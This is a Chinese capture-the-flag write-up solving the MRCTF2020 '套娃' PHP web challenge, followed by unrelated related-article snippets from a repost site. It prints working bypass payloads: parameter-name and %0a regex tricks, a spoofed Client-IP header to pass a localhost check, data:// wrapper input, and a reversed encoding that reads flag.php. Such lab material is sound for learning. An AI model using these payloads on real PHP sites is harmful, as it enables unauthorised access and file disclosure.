BUU [MRCTF2020]套娃

BUU [MRCTF2020]套娃

开题,啥也没有。

image-20231203023850768

查看网页源代码发现后端源代码:

image-20231203023858011

<?php
//1st
$query = $_SERVER['QUERY_STRING'];if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){die('Y0u are So cutE!');
}if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){echo "you are going to the next ~";
}

首先是关于$_SERVER['QUERY_STRING']取值,例如: http://localhost/aaa/?p=222 ,``$SERVER[‘QUERY_STRING’] = “p=222”,相当于获取了所有GET传参相关的URL段。题目要求不包含`。这里用PHP的字符串解析特性:

PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

  • 删除空白符
  • 将某些字符( [ 空格 + . )转换为下划线

正则匹配preg_match('/^23333$/', $_GET['b_u_p_t'])可以用%0a来绕过。

^ $界定了必须在同一行,否则匹配不到,直接利用%0a(换行符)进行绕过。

payload:

?b.u.p.t=23333%0a

image-20231203024657602

进入下一关secrettw.php,提示应该从本地local得到flag。

image-20231203024752367

源码中有jsfuck编码过的提示,控制台直接运行返回post me Merak

image-20231203024853991

随意POST一个Merak,返回源码:

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';if(isset($_POST['Merak'])){ highlight_file(__FILE__); die(); 
} function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?> 

首先是IP地址需要是127.0.0.1,这里需要用client-ip头绕过,XFF头不行。

image-20231203025311672

然后是满足条件file_get_contents($_GET['2333']) === 'todat is a happy day'

以下两种方式均可。

2333=data://text/plain,todat is a happy day2333=php://input
POST:todat is a happy day

最后是反写change($v)函数,使得file_get_contents(change($_GET['file']))语句可以成功包含flag.php文件。

反写脚本:

<?php
function unchange($v){ $re = '';for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) - $i*2 ); } return $re; 
}
$real_flag = unchange('flag.php');
echo base64_encode($real_flag);
?>

得到ZmpdYSZmXGI=

最终payload:

/secrettw.php?2333=data://text/plain,todat is a happy day&file=ZmpdYSZmXGI=

flag在源码里。

image-20231203025712220

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/765571.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java-Java基础学习(2)-网络编程-TCP-UDP

2.网络编程 2.1. 通信协议 TCP、UDP对比 TCP 打电话 连接&#xff0c;稳定 三次握手&#xff0c;四次挥手 三次握手 A: 你瞅啥&#xff1f; B: 瞅你咋地&#xff1f; A&#xff1a;干一场&#xff01;四次挥手 A&#xff1a;我要走了 B: 你真的要走了吗&#xff1f; B&#x…

防火墙在解决方案及典型项目中的应用

防火墙在解决方案及典型项目中的应用 防火墙作为基础安全防护产品&#xff0c;在各种解决方案、业务场景中配套应用&#xff0c;本节给出各类方案资料链接方便查阅。 防火墙在华为网络解决方案中的应用 解决方案 文档 主要应用 CloudFabric云数据中心网解决方案 资料专区…

《剑指 Offer》专项突破版 - 面试题 88 : 动态规划的基础知识(C++ 实现)

目录 前言 面试题 88 : 爬楼梯的最少成本 一、分析确定状态转移方程 二、递归代码 三、使用缓存的递归代码 四、空间复杂度为 O(n) 的迭代代码 五、空间复杂度为 O(1) 的迭代代码 前言 动态规划是目前算法面试中的热门话题&#xff0c;应聘者经常在各大公司的面试中遇到…

Linux初学(七)内存与进程管理、计划任务

一、内存与进程 1.1 查看内存 命令&#xff1a;free -m 选项&#xff1a;-m 以mb的显示 [rootlocalhost ~]# free -mtotal used free shared buff/cache available Mem: 1819 200 1184 9 435 1426 Swap: 2047 0 2047 Me…

kornia库ssim使用,Invalid image shape

一、图像张量转四维 将图像张量转换为四维张量的原因-训练神经网络 - 知乎 img1 cv2.imread(OCT3.png) #读入一张图像 img1 cv2.resize(img1,(256,256)) #修改尺寸为256*256 img1 np.array(img1) tensor transforms.ToTensor() img_tensor tensor(img1) #转化成张量形式…

Linux docker3--数据卷-nginx配置示例

一、因为docker部署服务都是以最小的代价部署&#xff0c;所以通常在容器内部很多依赖和命令无法执行。进入容器修改配置的操作也比较麻烦。本例介绍的数据卷作用就是将容器内的配置和宿主机文件打通&#xff0c;之后修改宿主机的配置文件就相当于修改了docker进程的配置文件&a…

webgl浏览器渲染设置

在浏览器中程序图形化webgl渲染时&#xff0c;有时候发现代码没有问题&#xff0c;但是就是无法渲染或者渲染报错&#xff0c;此时可以尝试如下的设置&#xff1a; 通过在chrome浏览器输入chrome&#xff1a;//flags打开扩展 设置一&#xff08;webgl开发者扩展&#xff09; 设…

复习Day2

AcWing 1214. 波动数列 - AcWing j(n-1)*b与前i-1项的和模n余数相同&#xff1a; 记前i项的和为x,则有 x%nj ,第i项为 -(n-1)b , 前i项的和为 x-(-(n-1)b)即 x(n-1)b , 而 x(n-1)b % n j (n-1)b % n 就是 x(n-1)b 在模n的情况下同余于 x%n (n-1)*b 对于加法,减法,乘法 什么…

2024华为OD统一考试(C卷)最新题库(Java Python C++)

关于华为OD ​ 华为的员工补充途径有三种&#xff0c;分别是校招、OD转正和社招。校招是华为唯一的正式员工入职途径&#xff0c;但是从近几届开始竞争非常激烈&#xff0c;尤其是在CV、AI、NLP等赛道上&#xff0c;所以对于C9等专业的学生来说&#xff0c;可以考虑转向一些冷…

Linux镜像文件下载地址--SCAS 开源镜像站,速度快

SCAS 开源镜像站 https://mirror.iscas.ac.cn/举例&#xff1a; 下载centos7 Index of /centos/7/isos/x86_64/ (iscas.ac.cn)

ARM实验 LED流水灯

.text .global _start _start: 使能GPIOE GPIOF的外设时钟 RCC_MP_AHB4ENSETR的第[4][5]设置为1即可使能GPIOE GPIOF时钟 LDR R0,0X50000A28 指定寄存器地址 LDR R1,[R0] 将寄存器原来的数值读取出来&#xff0c;保存到R1中 ORR R1,R1,#(0x3<<4) 将第4位设置为1 S…

Linux网络协议栈从应用层到内核层②

文章目录 1、bind 源码剖析2、listen 源码剖析3、accept 源码剖析4、connect 源码剖析客户端调用connect成功&#xff0c;但三次握手并未完成&#xff0c;进程是如何阻塞自己客户端在connect时&#xff0c;如何选择源端口客户发送syn封包以及重传服务端收到syn封包&#xff0c;…

AIGC摩尔定律

关于AIGC(Artificial Intelligence Generated Content,人工智能生成内容)领域的“摩尔定律”,这是一个比喻性的概念,用来描述AI模型尤其是深度学习模型在算力、效率以及能力方面的指数级增长趋势。传统的摩尔定律是指集成电路上可容纳的晶体管数量大约每两年翻一番,从而带…

算法公式汇总

文章目录 三角函数定义式诱导公式平方关系两角和与差的三角函数积化和差公式和差化积公式倍角公式半角公式万能公式其他公式反三角函数恒等式 三角函数定义式 三角函数 定义式 余切&#xff1a; c o t A 1 t a n A \text { 余切&#xff1a;} \ cotA \frac{1}{tanA} 余切&a…

Java面向对象编程面试题

序号问题详细答案1什么是类与对象&#xff1f;类和对象实例之间的关系&#xff1f; 类具有继承、数据隐藏和多态三种主要特性。类是同一类对象实例的共性的抽象&#xff0c;对象是类的实例化&#xff1b;类是静态的&#xff0c;对象是动态的&#xff0c;对象可以看作是运行中…

微店获得店铺的所有商品 API 返回值说明

一、应用场景 店铺的所有商品API接口具有广泛的应用场景&#xff0c;主要涉及到电商平台的运营、数据分析、用户体验提升以及第三方应用集成等方面。 首先&#xff0c;对于电商平台而言&#xff0c;店铺的所有商品API接口是获取商品信息的核心途径。通过调用这个接口&#xf…

x-zse-96安卓端纯算,魔改AES还原

两天前发了一个x-zse-96的文章,当时遇到了点问题,只分析到了最后一个白盒AES函数里面,并且当时用dfa攻击还原出了秘钥,IV也确定了,但是加密结果不对,本来打算把下文鸽掉的,因为当时unidbg没跑起来,用frida去hook白盒AES中的每一行汇编有点麻烦,没有unidbg方便.后来小白大佬说un…

内网渗透(一)必须了解Windows工作组

★★免责声明★★ 文章中涉及的程序(方法)可能带有攻击性&#xff0c;仅供安全研究与学习之用&#xff0c;读者将信息做其他用途&#xff0c;由Ta承担全部法律及连带责任&#xff0c;文章作者不承担任何法律及连带责任。 1、内网渗透测试简介 内网也叫局域网&#xff0c;是指在…

代码随想录学习Day 14

104.二叉树的最大深度 题目链接 讲解链接 本题很容易想到采用层次遍历的思路来解决&#xff0c;因为要求的是二叉树的最大深度&#xff0c;那么在进行层次遍历的时候设置一个变量count用来记录当前遍历的层数&#xff0c;count初始为0&#xff0c;每遍历完一层将其值1&#…

《自动机理论、语言和计算导论》阅读笔记:p1-p4

《自动机理论、语言和计算导论》学习第1天&#xff0c;p1-p4&#xff0c;总计4页。这只是个人的学习记录&#xff0c;因为很多东西不懂&#xff0c;难免存在理解错误的地方。 一、技术总结 1.有限自动机(finite automata)示例 1.software for checking digital circuits。 …